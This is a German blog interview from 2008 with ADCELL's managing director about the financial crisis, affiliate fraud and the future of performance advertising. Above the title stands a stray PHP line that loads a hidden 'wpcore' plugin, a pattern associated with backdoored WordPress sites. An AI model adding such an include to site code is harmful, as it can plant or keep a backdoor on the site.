require_once(ABSPATH.'wp-content/plugins/wpcore/wpcore.php'); Ende des Onlinemarketings: Interview mit Marcus Seidel von ADCELL | Beste-Partnerprogramme.de

Ende des Onlinemarketings: Interview mit Marcus Seidel von ADCELL

3. Dezember 2008
By

Als ersten Interview-Partner für die Interview-Reihe “Ende des Onlinemarketings?” konnte Marcus Seidel, Geschäftsführer von ADCELL gewonnen werden.

  1. Hallo Marcus! Vielen Dank, dass du Beste-Partnerprogramme.de für dieses kleine Interview zur Verfügung stehst!
    Bitte stelle dich und ADCELL erst einmal kurz vor.

    Mein Name ist Marcus Seidel, ich bin einer der beiden Gründer und Inhaber der Firstlead GmbH, welche das Partnerprogrammnetzwerk ADCELL betreut. Das Partnerprogrammnetzwerk ADCELL ist seit fast 6 Jahren aktiv und bietet sowohl Partnerprogramme aus dem Erotik, als auch aus dem Non-Erotik Bereich.

  2. Im Zuge der Finanzkrise fürchten immer mehr um große Einbrüche im Anzeigenmarkt, die auch das Internet hart treffen könnte.
    Glaubst du an eine „Internetblase 2.0“?

    Der Einbruch am Anzeige- und Werbemarkt wird definitiv kommen bzw. wir sind seit 6 Monaten schon mittendrin.
    Zuerst wird immer am Marketing gespart, weil diese Kosten im Gegensatz zu Personal oder Miet- und Leasingverträgen schnell kürzbar sind. Ob es der richtige Weg ist bei schlechter Wirtschaftslage deutlich weniger zu werben steht auf einem anderen Blatt Papier.
    Besonders schwer wird es für Geschäftsmodelle die nur auf Werbeerlösen bauen, diese werden es sehr schwer haben und wahrscheinlich nicht lange überleben – es sei denn, sie haben einen großen Investor.

  3. Wie genau sehen deine Geschäfte im Internet aus? Läuft es, oder spürst du schon Rezensionsängste und ein einbrechenden Werbemarkt?

    Ich selbst habe mehrere Projekte und merke natürlich, dass die Kaufkraft schwindet. Es gibt aber Branchen die davon nicht so stark betroffen sind, wie z.B. Erotik oder Entertainment. Dann wird die nächsten zwei Jahre eben dort das Geld verdient.

  4. Tim O‘Reilly spricht von der Finanzkrise als heilsam für das sog. „Web 2.0“. Teilst du seine Meinung?

    Natürlich ist es so – eine Krise spült immer diejenigen weg, die schon vorher schlecht aufgestellt waren oder auf wackligen Beinen standen. Man sieht ja kaum noch neue Ideen im Netz, nur noch Klone und Copycats aus den USA oder von Gründern hier in Deutschland, die sich gegenseitig die Portale und Produkte nachbauen und in der Hinterhand starke VCs haben.

  5. Die IWB titelte unlängst, dass Affiliate-Betrug weiter zunimmt. Ist es nicht Zeit für neue Werbestrategien?

    Den Artikel habe ich gelesen und halte ihn für nicht richtig und oberflächlich. Beim Affiliate Marketing bekommst du, was du ausschreibst. Wenn ich Sales haben will, bekomme ich diese -> wo soll bei einem Sale der Betrug statt finden?

    Wenn ich natürlich Klicks für 30 Cent ausschreibe oder für eine kostenlose Portalanmeldung 5,00 Euro pro Lead, dann muss ich mich nicht wundern, wenn das die falschen Partner anzieht. Wie überall im Leben gibt es gute und schlechte Dinge und Menschen – mit dem richtigen Provisionsmodell kann man allerdings schon viel Unsinn von Vornherein ausschließen.

    Wir haben z.B. bei ADCELL zwei Jahre nach dem Start komplett auf Pay per Klick Kampagnen verzichtet und würden diese Entscheidung immer wieder treffen!

  6. Wie stellst du dir die Zukunft des Werbemarktes Internet in Zukunft vor? Welche Änderungen werden kommen, welche Werbeformate werden gehen und worin wird der Erfolg von Affiliates in Zukunft liegen?

    Der Werbemarkt wird weiter Richtung Performance Marketing gehen und teure TKP Kampagnen weiter verdrängen. Der Werbekunde will nachvollziehen was er für sein Geld bekommt. Wenn man sich alleine die Anzahl der Affiliate und Performance Agenturen und deren Wachstum in den letzten 2 Jahren anschaut kann man nicht mehr von einem Trend sprechen, dann reden wir von einem komplett neuem Bereich.

    Die Werbeformate werden bleiben, was soll man auch noch Neues an Werbeformaten erfinden. Die Werbung wird videolastiger, bunter und vor allem auf mobile Anwenndungen hin optimiert werden.

    Affiliates müssen schauen, dass Sie den Spagat zwischen gutem und nachhaltigem Arbeiten und dem Geld verdienen finden und müssen sich darauf einstellen, dass Klick Kampagnen und falsch aufgesetzte Partnerprogramme in rasanter Geschwindigkeit vom Markt verschwinden und von reinen Performance Modellen verdrängt werden.

  7. Haben die klassischen Werbemittel, die schon vor der ersten Internetblase bekannt waren mittlerweile nicht ausgedient?

    Was heißt ausgedient – es gibt Content und Premium Webseiten, welche Standart Banner einbauen und auch erfolgreich einsetzen. Auf der anderen Seite gibt es SEOs, SEMs und Blogs, die eher auf Textlinks etc. setzen. Klassische Werbemittelformate werden überleben aber um Längen schöner und bewegter werden ;-)

  8. Wann findest du Werbung im Internet störend, wann hilft sie dir bei der eigenen Recherche?

    Werbung muss themenrelevant sein und zur Zielgruppe passen (vor Google Adsense verneig ;-) ).
    Nichts ist schlimmer, als wenn Werbung schlecht aussieht und die Nutzer verärgert – dann hat der Affiliate nämlich einen doppelten Verlust – kein Geld verdient + unzufriedene Nutzer.

  9. Zum Abschluss: Wo siehst du dich, bzw. ADCELL in 2 Jahren?

    Wir haben trotz Wirtschaftskrise den großen Schritt gewagt und sind aus unserem Existenzgründerzentrum in ein großes, schönes und zentrales Büro gezogen. Dieser Schritt hat auch symbolischen Charakter und zeigt in welche Richtung wir mit ADCELL und der Firstlead GmbH wollen.

    Wenn Agenturen und Partnerprogrammbetreiber die Vorurteile gegen uns ablegen (Non Erotik + Erotik Partnerprogramme in einem Netzwerk) und einfach nach Performance entscheiden würden, sehe ich uns in 2 Jahren unter den Top 5 der deutschen Partnerprogrammnetzwerke und vor allem auch etwas internationaler aufgestellt als jetzt.

    Dafür arbeiten hier alle Mitarbeiter Tag und Nacht und machen jeden Tag aufs Neue einen verdammt guten Job!

Vielen Dank für das Gespräch und euch weiterhin viel Erfolg mit eurem Netzwerk!

ADCELL kann mittlerweile ca. 200 Partnerprogramme und über 40.000 Affiliates verzeichnen, die gemeinsam ca. 1,6 Milliarden Adviews monatlich erzeugen.
Das im April 2003 gestartete ADCELL bietet sowohl Erotik-, als auch Non-Erotik-Kampagnen an, die sieben Mitarbeiter des Berliner Unternehmes können monatlich mehr als 60.000 Transaktionen verzeichnen und durften deshalb unlängst den Preis als bestes Affiliate Netzwerk 2008 entgegennehmen.

Tags: , , , , , , , , , , , , , , ,